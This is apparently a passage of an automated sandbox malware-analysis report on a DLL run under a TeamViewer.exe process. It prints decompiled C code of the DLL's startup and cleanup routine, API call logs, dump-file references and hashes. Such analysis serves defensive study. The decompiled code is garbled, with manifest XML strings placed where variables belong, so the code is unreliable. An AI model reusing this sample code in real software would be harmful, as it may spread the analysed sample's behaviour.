					if(_t11 != 0) {
						 *_t11 = _t13 - 1;
					}
				}
				return _t12;
			}








                                                                                                                        0x6f33a2f2
                                                                                                                        0x6f33a2fc
                                                                                                                        0x6f33a307
                                                                                                                        0x6f33a30a
                                                                                                                        0x6f33a317
                                                                                                                        0x6f33a31b
                                                                                                                        0x6f33a31d
                                                                                                                        0x6f33a335
                                                                                                                        0x6f33a33e
                                                                                                                        0x6f33a344
                                                                                                                        0x6f33a34a
                                                                                                                        0x6f33a34d
                                                                                                                        0x6f33a34d
                                                                                                                        0x6f33a34a
                                                                                                                        0x6f33a355

                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A311
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A33E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction ID: c69044fcc06c6c2d78e20d22f4d4effe7338ccd1a74ded6e4d271befcf7ba498
                                                                                                                        • Opcode Fuzzy Hash: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction Fuzzy Hash: B5F04F7760462E7FEA108A6A8C84F67B7ADEB86BB5F100229FA24D31C0D660EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A360, Relevance: 5.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A360(char* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t12;
				short* _t13;
				int _t14;
				int _t18;
				char* _t19;

				_t19 = _a4;
				_t13 = 0;
				asm("sbb esi, esi");
				_t18 =  ~_a8 & 0x0000fde9;
				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0);
				if(_t14 > 0) {
					_t4 = _t14 + 2; // 0x2
					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4);
					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
					_t12 = _a12;
					if(_t12 != 0) {
						 *_t12 = _t14 - 1;
					}
				}
				return _t13;
			}








                                                                                                                        0x6f33a362
                                                                                                                        0x6f33a36c
                                                                                                                        0x6f33a375
                                                                                                                        0x6f33a378
                                                                                                                        0x6f33a385
                                                                                                                        0x6f33a389
                                                                                                                        0x6f33a38b
                                                                                                                        0x6f33a3a0
                                                                                                                        0x6f33a3a9
                                                                                                                        0x6f33a3af
                                                                                                                        0x6f33a3b5
                                                                                                                        0x6f33a3b8
                                                                                                                        0x6f33a3b8
                                                                                                                        0x6f33a3b5
                                                                                                                        0x6f33a3c0

                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,74786900,6F3339D7,?,00000000,00000000), ref: 6F33A37F
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                        • MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction ID: 4af41991ab75589ae8fc3341def39c1de76c2ef6b34f59a69a079a8b4dbe007d
                                                                                                                        • Opcode Fuzzy Hash: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction Fuzzy Hash: 2EF09677600A2D7FEB108AA98C84E67B7EDEB86775F100229FA24D32C0D770EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Analysis Process: TeamViewer.exe PID: 5424 Parent PID: 4920 TeamViewer.exeCOMMON

                                                                                                                        Executed Functions

                                                                                                                        Function 6F338510, Relevance: 246.2, APIs: 122, Strings: 18, Instructions: 1164memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F338510(struct HINSTANCE__* _a4, intOrPtr _a8) {
				char _v268;
				char _v276;
				char _v284;
				char _v292;
				char _v524;
				char _v532;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v568;
				char _v576;
				char _v584;
				int _v588;
				char _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				int _v604;
				char* _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				int _v620;
				char* _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				int _v636;
				char* _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				int _v652;
				char* _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				int _v668;
				char* _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				int _v684;
				char* _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				int _v700;
				char* _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				int _v716;
				char* _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				int _v732;
				char* _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				int _v748;
				char* _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				int _v764;
				char* _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				int _v780;
				char* _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				int _v796;
				char* _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				int _v812;
				char* _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				int _v828;
				char* _v832;
				short _v836;
				intOrPtr _v840;
				long _v844;
				char* _v848;
				char _v852;
				long _v856;
				void _v860;
				char _v868;
				long _v872;
				intOrPtr _v888;
				int _v908;
				char* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				int _v924;
				char* _v928;
				void* _v932;
				char _v936;
				char _v937;
				char _v938;
				short _v939;
				void* _v940;
				char _v944;
				char _v945;
				short _v947;
				void* _v948;
				char _v952;
				void* _v956;
				char _v960;
				short _v962;
				short _v964;
				short _v966;
				char _v968;
				short _v970;
				char _v972;
				short _v974;
				short _v976;
				int _v980;
				signed int _v984;
				signed int _v992;
				intOrPtr _t262;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				struct HINSTANCE__* _t277;
				struct HINSTANCE__* _t278;
				struct HINSTANCE__* _t279;
				struct HINSTANCE__* _t280;
				struct HINSTANCE__* _t281;
				struct HINSTANCE__* _t282;
				struct HINSTANCE__* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				CHAR* _t343;
				CHAR* _t347;
				void* _t350;
				void* _t351;
				void* _t352;
				CHAR* _t355;
				void* _t357;
				CHAR* _t359;
				long _t360;
				char* _t362;
				void* _t363;
				intOrPtr _t365;
				char _t366;
				WCHAR* _t369;
				void* _t371;
				CHAR* _t373;
				intOrPtr _t375;
				CHAR* _t390;
				CHAR* _t400;
				void* _t403;
				signed int _t404;
				int _t407;
				char _t408;
				struct HINSTANCE__* _t410;
				intOrPtr _t413;
				void* _t415;
				struct HINSTANCE__* _t420;
				long _t423;
				void* _t424;
				struct HINSTANCE__* _t427;
				void* _t428;
				struct HINSTANCE__* _t431;
				void* _t432;
				char _t433;
				struct HINSTANCE__* _t435;
				void* _t436;
				char _t437;
				struct HINSTANCE__* _t439;
				void* _t441;
				struct HINSTANCE__* _t446;
				void* _t447;
				struct HINSTANCE__* _t450;
				intOrPtr _t451;
				intOrPtr _t463;
				char* _t464;
				struct HWND__* _t466;
				struct HWND__* _t468;
				char _t470;
				intOrPtr* _t476;
				char* _t477;
				int _t478;
				void* _t480;
				void* _t481;
				int _t483;
				short* _t484;
				long _t489;
				long _t493;
				char* _t502;
				int _t503;
				char* _t504;
				char _t505;
				WCHAR* _t507;
				void* _t509;
				CHAR* _t511;
				char _t512;
				char _t514;
				char _t515;
				char _t531;
				void* _t541;
				void* _t543;
				char* _t544;
				char* _t546;
				char _t548;
				void* _t549;
				CHAR* _t552;
				CHAR* _t553;
				char _t560;
				char _t561;
				intOrPtr _t568;
				intOrPtr _t575;
				void* _t576;
				void* _t589;
				signed int _t591;
				void* _t592;
				signed int _t596;
				void** _t598;
				intOrPtr* _t601;
				void* _t605;
				struct HINSTANCE__* _t606;
				void* _t611;
				void* _t613;
				void* _t618;
				void* _t621;
				void* _t622;
				void* _t623;
				void* _t624;
				void* _t625;
				void* _t626;
				void* _t627;
				void* _t628;
				void* _t632;
				void* _t633;

				_t262 = _a8;
				if(_t262 == 0) {
					_t263 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
					__eflags = _t263;
					if(_t263 != 0) {
						HeapFree(GetProcessHeap(), 0, _t263);
					}
					_t264 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
					__eflags = _t264;
					if(_t264 != 0) {
						HeapFree(GetProcessHeap(), 0, _t264);
					}
					_t265 = M6F340520; // 0xa4df18
					__eflags = _t265;
					if(_t265 != 0) {
						HeapFree(GetProcessHeap(), 0, _t265);
					}
					_t266 = M6F340524; // 0xa56118
					__eflags = _t266;
					if(_t266 != 0) {
						HeapFree(GetProcessHeap(), 0, _t266);
					}
					_t267 = M6F340528; // 0xa53e68
					__eflags = _t267;
					if(_t267 != 0) {
						HeapFree(GetProcessHeap(), 0, _t267);
					}
					_t268 = M6F340530; // 0xa32c28
					__eflags = _t268;
					if(_t268 != 0) {
						HeapFree(GetProcessHeap(), 0, _t268);
					}
					_t269 = M6F340534; // 0xa563b0
					__eflags = _t269;
					if(_t269 != 0) {
						HeapFree(GetProcessHeap(), 0, _t269);
					}
					_t270 = M6F3404F8; // 0xa56660
					__eflags = _t270;
					if(_t270 != 0) {
						HeapFree(GetProcessHeap(), 0, _t270);
					}
					_t271 = M6F340504; // 0xa59868
					__eflags = _t271;
					if(_t271 != 0) {
						HeapFree(GetProcessHeap(), 0, _t271);
					}
					_t272 = M6F3404F4; // 0xa55c48
					__eflags = _t272;
					if(_t272 != 0) {
						HeapFree(GetProcessHeap(), 0, _t272);
					}
					_t273 = M6F340500; // 0xa45a70
					__eflags = _t273;
					if(_t273 != 0) {
						HeapFree(GetProcessHeap(), 0, _t273);
					}
					_t274 = M6F3404CC; // 0xa32d38
					__eflags = _t274;
					if(_t274 != 0) {
						HeapFree(GetProcessHeap(), 0, _t274);
					}
					_t275 = M6F3404D0; // 0xa58418
					__eflags = _t275;
					if(_t275 != 0) {
						HeapFree(GetProcessHeap(), 0, _t275);
					}
					__eflags = "\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x1
					if(__eflags != 0) {
						_t277 = M6F3404A8; // 0x6f240000
						__eflags = _t277;
						if(_t277 != 0) {
							FreeLibrary(_t277);
						}
						_t278 = M6F340490; // 0x770a0000
						__eflags = _t278;
						if(_t278 != 0) {
							FreeLibrary(_t278);
						}
						_t279 = M6F340494; // 0x748e0000
						__eflags = _t279;
						if(_t279 != 0) {
							FreeLibrary(_t279);
						}
						_t280 = M6F340498; // 0x76130000
						__eflags = _t280;
						if(_t280 != 0) {
							FreeLibrary(_t280);
						}
						_t281 = M6F34049C; // 0x73c30000
						__eflags = _t281;
						if(_t281 != 0) {
							FreeLibrary(_t281);
						}
						_t282 = M6F3404A0; // 0x773a0000
						__eflags = _t282;
						if(_t282 != 0) {
							FreeLibrary(_t282);
						}
						_t283 = M6F3404A4; // 0x70950000
						__eflags = _t283;
						if(_t283 != 0) {
							FreeLibrary(_t283);
						}
						_t284 =  *0x6f34047c; // 0xa545e0
						__eflags = _t284;
						if(_t284 != 0) {
							HeapFree(GetProcessHeap(), 0, _t284);
						}
						_t285 = M6F3404D4; // 0xa45f28
						__eflags = _t285;
						if(_t285 != 0) {
							HeapFree(GetProcessHeap(), 0, _t285);
						}
						_t286 = M6F3404DC; // 0xa55ca8
						__eflags = _t286;
						if(_t286 != 0) {
							HeapFree(GetProcessHeap(), 0, _t286);
						}
						_t287 = M6F3404D8; // 0xa55cd8
						__eflags = _t287;
						if(_t287 != 0) {
							HeapFree(GetProcessHeap(), 0, _t287);
						}
						_t288 = M6F3404F0; // 0xa54ab0
						__eflags = _t288;
						if(_t288 != 0) {
							LocalFree(_t288);
						}
						__eflags = M6F340614 - 2;
						if(M6F340614 == 2) {
							E6F33B840(0);
						}
						__eflags = M6F340614; // 0x2
						if(__eflags > 0) {
							E6F33B510();
						}
						_t598 = 0x6f34046c;
						do {
							_t289 =  *_t598;
							__eflags = _t289;
							if(_t289 != 0) {
								CloseHandle(_t289);
							}
							_t598 =  &(_t598[1]);
							__eflags = _t598 - 0x6f340478;
						} while (_t598 < 0x6f340478);
						_t290 = M6F340510; // 0x360
						__eflags = _t290;
						if(_t290 != 0) {
							NtTerminateThread(_t290, 0);
							_t541 = M6F340510; // 0x360
							CloseHandle(_t541);
						}
					}
					goto L131;
				} else {
					if(_t262 != 1) {
						L131:
						return 1;
					} else {
						DisableThreadLibraryCalls(_a4);
						"<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(0);
						_v928 = 0;
						_t343 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						"on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t343;
						if(GetSystemDirectoryA(_t343, 0x105) == 0) {
							ExitProcess(0);
						}
						_t502 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
						PathAddBackslashA(_t502); // executed
						_t347 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						"     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t347;
						M6F34052C = GetModuleFileNameA(_a4, _t347, 0x104);
						_t350 = HeapAlloc(GetProcessHeap(), 8, 0x105);
						_t503 = M6F34052C; // 0x33
						_t543 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
						M6F340524 = _t350;
						RtlMoveMemory(_t350, _t543, _t503);
						_t351 = M6F340524; // 0xa56118
						_t352 = E6F33A360(_t351, 0, 0);
						_t504 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
						M6F340528 = _t352;
						PathRemoveFileSpecA(_t504);
						_t544 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
						PathAddBackslashA(_t544);
						_t355 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
						SetCurrentDirectoryA(_t355);
